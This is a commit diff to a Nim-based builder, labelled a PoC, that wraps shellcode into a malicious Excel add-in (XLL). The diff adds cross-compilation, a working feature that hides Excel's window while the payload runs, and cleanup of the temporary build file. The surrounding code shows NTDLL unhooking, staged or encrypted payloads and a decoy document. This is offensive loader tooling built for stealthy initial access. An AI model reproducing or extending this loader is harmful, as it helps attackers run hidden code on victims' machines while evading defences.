v0.2.2

Cross-compilation and Excel window hiding

Author: zimnyaa

README.md

@@ -40,7 +40,7 @@ stageless arguments:
 
 compilation arguments:
   -n, --skip-unhook     do not do NTDLL unhooking
-  -w, --hidewindow      hide excel window during execution # TODO
+  -w, --hidewindow      hide excel window during execution
   -d DECOY, --decoy DECOY
                         path to the decoy file to open on startup (optional)
   -v, --verbose         increase output verbosity

build.py

@@ -17,9 +17,7 @@
 (_/ \\_)\\__  |_|   \\____)_|_|\\_||_|
       (____/       Nim XLL builder PoC v0.2.1               
 """
-if os.name != 'nt':
-	print("| cross-compilation coming soon™")
-	exit(1)
+
 print(banner)
 def encode_shellcode(sc_bytes):
 	STATE_OPEN = "<"
@@ -94,7 +92,7 @@ def bytes_to_nimarr(bytestr, varname, genconst=False):
 	help="do not do NTDLL unhooking")
 
 compilation.add_argument("-w", "--hidewindow", action="store_true",
-	help="hide excel window during execution # TODO")
+	help="hide excel window during execution")
 
 compilation.add_argument("-d", "--decoy", type=str,
 	help="path to the decoy file to open on startup (optional)")
@@ -121,6 +119,10 @@ def bytes_to_nimarr(bytestr, varname, genconst=False):
 
 compile_template = "nim c --app:lib --passL:\"-static-libgcc -static -lpthread\" --hints:off --define:excel {cmdline_args} --nomain --out:{outfile} --threads:on {filename}"
 cmdline_args = ""
+if os.name != 'nt':
+	print("| cross-compilation unstable")
+	cmdline_args += "--define:mingw --cpu:amd64 "
+
 
 if not args.skip_unhook:
 	cmdline_args += "--define:unhook "
@@ -130,7 +132,7 @@ def bytes_to_nimarr(bytestr, varname, genconst=False):
 
 if args.hidewindow:
 	cmdline_args += "--define:hidewindow "
-	print("| hide excel window: TODO")
+	print("| hide excel window: on")
 else:
 	print("| hide excel window: off")
 
@@ -200,4 +202,5 @@ def bytes_to_nimarr(bytestr, varname, genconst=False):
 if args.verbose:
 	print(" \\ command line:", compile_template.format(cmdline_args=cmdline_args, outfile=args.output, filename=tempname))
 os.system(compile_template.format(cmdline_args=cmdline_args, outfile=args.output, filename=tempname))
+os.remove(tempname)
 print("! should be saved to: ", args.output)

xll_template.nim

@@ -1,7 +1,6 @@
 import winim
 import winim/com
-
-when defined unhook:
+when (defined unhook) or (defined hidewindow):
   import ptr_math
 import std/strutils
 when defined staged:
@@ -17,13 +16,13 @@ when defined encrypted:
 include syscalls
 
 
-
+proc toString(bytes: openarray[byte]): string =
+  result = newString(bytes.len)
+  copyMem(result[0].addr, bytes[0].unsafeAddr, bytes.len)
 proc NimMain() {.cdecl, importc.}
 
 when defined unhook:
-  proc toString(bytes: openarray[byte]): string =
-    result = newString(bytes.len)
-    copyMem(result[0].addr, bytes[0].unsafeAddr, bytes.len)
+
 
   proc ntdll_mapviewoffile() =
     let low: uint16 = 0
@@ -75,12 +74,24 @@ when defined unhook:
     CloseHandle(ntdllMapping)
     FreeLibrary(ntdllModule)
 
+when defined hidewindow:
+  proc wndenumcallback(windowHandle: HWND, param: LPARAM): WINBOOL {.stdcall.} = 
+    var process_id: DwORD
+    var wanted = cast[ptr DWORD](param)
+    GetWindowThreadProcessId(windowHandle, &process_id);
+    if process_id == wanted[]:
+            ShowWindow(windowHandle, SW_FORCEMINIMIZE)
+    return true
+  
+  proc hidewindow() = 
+    var processID = GetCurrentProcessId();
+    EnumWindows(wndenumcallback, cast[LPARAM](addr processID))
+
 
 
 proc run() {.thread, gcsafe.} =
   when defined hidewindow:
-    # TODO: add window hiding (FindWindow+ShowWindow does not work for some reason)
-    echo "COMING SOON"
+    hidewindow()
 
   when defined decoy:
     const asset = slurp("%DECOYPATH%")